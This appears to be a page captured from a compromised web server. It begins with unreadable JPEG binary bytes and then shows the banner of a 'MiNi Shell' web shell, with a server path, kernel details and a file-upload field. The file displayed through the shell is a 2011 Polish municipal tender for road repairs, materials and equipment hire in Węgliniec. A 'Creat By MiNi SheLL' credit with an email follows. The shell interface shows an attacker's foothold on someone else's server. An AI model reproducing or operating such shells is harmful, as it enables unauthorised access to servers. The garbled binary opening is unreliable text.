JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110421/88146-N-2011.html

<p class="kh_header"><b>Węgliniec: Zakup materiałów, wynajem sprzętu  i remont cząstkowy dróg na terenie Gminy Węgliniec</b><br>
<b>Numer ogłoszenia: 88146 - 2011; data zamieszczenia: 21.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Węgliniec , ul. Sikorskiego 3, 59-940 Węgliniec, woj. dolnośląskie, tel. 075 77 11 435, faks 075 77 12 551.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wegliniec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup materiałów, wynajem sprzętu  i remont cząstkowy dróg na terenie Gminy Węgliniec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup materiałów, wynajem sprzętu  i remont cząstkowy dróg na terenie Gminy Węgliniec

3.1.ZADANIE NR 1 - Zakup pospółki o frakcji 2÷31 mm w ilości 1 500 ton

3.1.1. Dostawa pospółki będzie następowała sukcesywnie w ilościach i do miejsc wskazanych przez  Zamawiającego. 
3.1.2. Zamawiający każdorazowo powiadomi Wykonawcę z wyprzedzeniem 2 dni od przewidywanego terminu dostawy, a dostawy  pospółki będą realizowane do 16 września 2011r. i do tego czasu pospółka będzie przechowywana  u  wykonawcy.
3.1.3. Ilość ton określona w formularzu ofertowym jest orientacyjna i może ulec zmianie w trakcie realizacji .
3.1.4. Zamawiający zapłaci za ilość rzeczywiście zakupionych ton zgodnie z ceną jednostkową określoną w ofercie.
3.1.5. Cena oferty musi obejmować wszystkie koszty związane z realizacją przedmiotu zamówienia.

3.2.ZADANIE NR 2 - zakup tłucznia bazaltowego 0÷31,5 mm w ilości 1 500 ton

3.2.1. Dostawa tłucznia będzie następowała sukcesywnie w ilościach i do miejsc wskazanych przez  Zamawiającego. 
3.2.2. Zamawiający każdorazowo powiadomi Wykonawcę z wyprzedzeniem 2 dni od przewidywanego terminu dostawy, a dostawy  tłucznia będą realizowane do 16 września 2011r. i do tego czasu pospółka będzie przechowywana  u  wykonawcy.
3.2.3. Ilość ton określona w formularzu ofertowym jest orientacyjna i może ulec zmianie w trakcie realizacji .
3.2.4. Zamawiający zapłaci za ilość rzeczywiście zakupionych ton zgodnie z ceną jednostkową określoną w ofercie.
3.2.5. Cena oferty musi obejmować wszystkie koszty związane z realizacją przedmiotu zamówienia

3.3. ZADANIE NR 3 - naprawa dróg asfaltowych
a) remont cząstkowy nawierzchni z wycinaniem krawędzi - około 200 m2
b) remont cząstkowy nawierzchni bez wycinania krawędzi - około 50 m2
3.3.1. Ilość metrów określona w formularzu ofertowym jest orientacyjna i może ulec zmianie w trakcie realizacji .
3.3.2. Zamawiający zapłaci za ilość rzeczywiście zrealizowanych metrów zgodnie z ceną jednostkową określoną w ofercie.
3.3.3. Cena oferty musi obejmować wszystkie koszty związane z realizacją przedmiotu zamówienia


3.4. ZADANIE NR 4 - naprawa dróg asfaltowych - skrapianie
a) jednokrotne skrapianie spękanej nawierzchni z zasypaniem posypką mineralną - około 200 m2
b) dwukrotne skrapianie spękanej nawierzchni z zasypaniem posypką mineralną - około 200 m2
3.4.1. Ilość metrów określona w formularzu ofertowym jest orientacyjna i może ulec zmianie w trakcie realizacji .
3.4.2. Zamawiający zapłaci za ilość rzeczywiście zrealizowanych metrów zgodnie z ceną jednostkową określoną w ofercie.
3.4.3. Cena oferty musi obejmować wszystkie koszty związane z realizacją przedmiotu zamówienia

3.5.ZADANIE NR 5 -  wynajem sprzętu 
a)	równiarka 
b)	walec wibracyjny samojezdny
c)	koparka
3.5.1.Wynajem sprzętu wraz z kierowcą lub operatorem będzie następował sukcesywnie od dnia podpisania umowy do 15 września 2011r.
3.5.2. Wykonawca zobowiązany jest do podstawienia w/w sprzętu wraz z uprawnionym kierowcą lub operatorem w miejscu i terminie wskazanym przez Zamawiającego
3.5.3.Ilość godzin pracy określona w formularzu ofertowym jest orientacyjna i może ulec zmianie w trakcie realizacji .
3.5.4. Zamawiający zapłaci za ilość rzeczywiście wykonanych i potwierdzonych na karcie drogowej godzin usługi z ceną jednostkową określoną w ofercie.
3.5.5. Cena oferty musi obejmować wszystkie koszty związane z realizacją przedmiotu zamówienia.
3.5.6. Wykonawca jest zobowiązany do przestrzegania wymogów ustawy z dnia 7 marca 2003r. Prawo o ruchu drogowym Dz. U. Nr.58 poz. 515 (tekst jednolity) oraz ustawy z dnia 6 września 2001 r. o transporcie drogowym Dz. U. Nr 125 poz.1371
3.5.7.W/w koszty winny zostać ujęte w cenach jednostkowych za wynajem sprzętu.

3.6. ZADANIE NR 6 - wynajem transportu 
a)	transport towarowy materiałów sypkich

3.6.1.Wynajem transportu wraz z kierowcą będzie następował sukcesywnie od dnia podpisania umowy do 15 września 2011r.
3.6.2. Wykonawca zobowiązany jest do podstawienia w/w transportu wraz z uprawnionym kierowcą w miejscu i terminie wskazanym przez Zamawiającego
3.6.3.Ilość godzin pracy określona w formularzu ofertowym jest orientacyjna i może ulec zmianie w trakcie realizacji .
3.6.4. Zamawiający zapłaci za ilość rzeczywiście wykonanych i potwierdzonych na karcie drogowej godzin usługi z ceną jednostkową określoną w ofercie.
3.6.5. Cena oferty musi obejmować wszystkie koszty związane z realizacją przedmiotu zamówienia.
3.6.6. Wykonawca jest zobowiązany do przestrzegania wymogów ustawy z dnia 7 marca 2003r. Prawo o ruchu drogowym Dz. U. Nr.58 poz. 515 (tekst jednolity) oraz ustawy z dnia 6 września 2001 r. o transporcie drogowym Dz. U. Nr 125 poz.1371
3.6.7.W/w koszty winny zostać ujęte w cenach jednostkowych za wynajem sprzętu.


4.	W formularzu oferty podano szacunkową ilość materiałów, metrów, godzin oraz t/km, które służą tylko i wyłącznie do porównania ofert.
5.	Zamawiający dopuszcza składanie ofert częściowych.
6.	Zamawiający nie dopuszcza możliwości składania ofert wariantowych
7.	Zamawiający nie zamierza zawierać umowy ramowej.
8.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.
9.	Zamawiający przewiduje udzielenie zamówień uzupełniających do 50% zamówienia podstawowego polegającego na powtórzeniu tego samego rodzaju zamówienia. 
10.	Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
11.	Ustala się następujące warunki płatności.
11.1.Wartość umowy nie może zostać podwyższona w drodze aneksu  do niniejszej Umowy. Wartość całkowita przedmiotu umowy nie będzie waloryzowana w okresie realizacji umowy
11.2. Faktura powinna być  adresowana do: Gmina Węgliniec, ul. Sikorskiego 3, 59-940 Węgliniec. NIP - 615-18-08-660
11.3. Płatność za fakturę VAT będzie dokonana przelewem z konta Zamawiającego na konto Wykonawcy w terminie 30 dni od daty dostarczenia faktury VAT do siedziby Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do 50% zamówienia podstawowego polegającego na powtórzeniu tego samego rodzaju zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 14.21.00.00-6, 45.23.31.42-6, 60.18.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wegliniec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta
ul.Sikorskiego3
59 - 940 Węgliniec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2011 godzina 12:00, miejsce: Urząd Gminy i Miasta
ul.Sikorskiego3
59 - 940 Węgliniec
Sekretariat pokój nr 21.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup pospółki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 - Zakup pospółki o frakcji 2÷31 mm w ilości 1 500 ton

1. Dostawa pospółki będzie następowała sukcesywnie w ilościach i do miejsc wskazanych przez  Zamawiającego. 
2. Zamawiający każdorazowo powiadomi Wykonawcę z wyprzedzeniem 2 dni od przewidywanego terminu dostawy, a dostawy  pospółki będą realizowane do 15 września 2011r. i do tego czasu pospółka będzie przechowywana  u  wykonawcy.
3. Ilość ton określona w formularzu ofertowym jest orientacyjna i może ulec zmianie w trakcie realizacji .
4. Zamawiający zapłaci za ilość rzeczywiście zakupionych ton zgodnie z ceną jednostkową określoną w ofercie.
5. Cena oferty musi obejmować wszystkie koszty związane z realizacją przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 14.21.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup tłucznia bazaltowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 2 - zakup tłucznia bazaltowego 0÷31,5 mm w ilości 1 500 ton

1. Dostawa tłucznia będzie następowała sukcesywnie w ilościach i do miejsc wskazanych przez  Zamawiającego. 
2. Zamawiający każdorazowo powiadomi Wykonawcę z wyprzedzeniem 2 dni od przewidywanego terminu dostawy, a dostawy  tłucznia będą realizowane do 15 września 2011r. i do tego czasu pospółka będzie przechowywana  u  wykonawcy.
3. Ilość ton określona w formularzu ofertowym jest orientacyjna i może ulec zmianie w trakcie realizacji .
4. Zamawiający zapłaci za ilość rzeczywiście zakupionych ton zgodnie z ceną jednostkową określoną w ofercie.
5. Cena oferty musi obejmować wszystkie koszty związane z realizacją przedmiotu zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 14.21.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Naprawa dróg asfaltowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 3 - naprawa dróg asfaltowych
a) remont cząstkowy nawierzchni z wycinaniem krawędzi - około 200 m2
b) remont cząstkowy nawierzchni bez wycinania krawędzi - około 50 m2
1. Ilość metrów określona w formularzu ofertowym jest orientacyjna i może ulec zmianie w trakcie realizacji .
2. Zamawiający zapłaci za ilość rzeczywiście zrealizowanych metrów zgodnie z ceną jednostkową określoną w ofercie.
3. Cena oferty musi obejmować wszystkie koszty związane z realizacją przedmiotu zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Naprawa dróg asfaltowych- skrapianie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 4 - naprawa dróg asfaltowych - skrapianie
a) jednokrotne skrapianie spękanej nawierzchni z zasypaniem posypką mineralną - około 200 m2
b) dwukrotne skrapianie spękanej nawierzchni z zasypaniem posypką mineralną - około 200 m2
1. Ilość metrów określona w formularzu ofertowym jest orientacyjna i może ulec zmianie w trakcie realizacji .
2. Zamawiający zapłaci za ilość rzeczywiście zrealizowanych metrów zgodnie z ceną jednostkową określoną w ofercie.
3. Cena oferty musi obejmować wszystkie koszty związane z realizacją przedmiotu zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wynajem sprzętu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 5 -  wynajem sprzętu 
a)	równiarka 
b)	walec wibracyjny samojezdny
c)	koparka
1.Wynajem sprzętu wraz z kierowcą lub operatorem będzie następował sukcesywnie od dnia podpisania umowy do 15 września 2011r.
2. Wykonawca zobowiązany jest do podstawienia w/w sprzętu wraz z uprawnionym kierowcą lub operatorem w miejscu i terminie wskazanym przez Zamawiającego
3.Ilość godzin pracy określona w formularzu ofertowym jest orientacyjna i może ulec zmianie w trakcie realizacji .
4. Zamawiający zapłaci za ilość rzeczywiście wykonanych i potwierdzonych na karcie drogowej godzin usługi z ceną jednostkową określoną w ofercie.
5. Cena oferty musi obejmować wszystkie koszty związane z realizacją przedmiotu zamówienia.
6. Wykonawca jest zobowiązany do przestrzegania wymogów ustawy z dnia 7 marca 2003r. Prawo o ruchu drogowym Dz. U. Nr.58 poz. 515 (tekst jednolity) oraz ustawy z dnia 6 września 2001 r. o transporcie drogowym Dz. U. Nr 125 poz.1371
7.W/w koszty winny zostać ujęte w cenach jednostkowych za wynajem sprzętu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.18.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wynajem transportu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 6 - wynajem transportu 
a)	transport towarowy materiałów sypkich

1.Wynajem transportu wraz z kierowcą będzie następował sukcesywnie od dnia podpisania umowy do 15 września 2011r.
2. Wykonawca zobowiązany jest do podstawienia w/w transportu wraz z uprawnionym kierowcą w miejscu i terminie wskazanym przez Zamawiającego
3.Ilość godzin pracy określona w formularzu ofertowym jest orientacyjna i może ulec zmianie w trakcie realizacji .
4. Zamawiający zapłaci za ilość rzeczywiście wykonanych i potwierdzonych na karcie drogowej godzin usługi z ceną jednostkową określoną w ofercie.
5. Cena oferty musi obejmować wszystkie koszty związane z realizacją przedmiotu zamówienia.
6. Wykonawca jest zobowiązany do przestrzegania wymogów ustawy z dnia 7 marca 2003r. Prawo o ruchu drogowym Dz. U. Nr.58 poz. 515 (tekst jednolity) oraz ustawy z dnia 6 września 2001 r. o transporcie drogowym Dz. U. Nr 125 poz.1371
7.W/w koszty winny zostać ujęte w cenach jednostkowych za wynajem sprzętu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.18.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com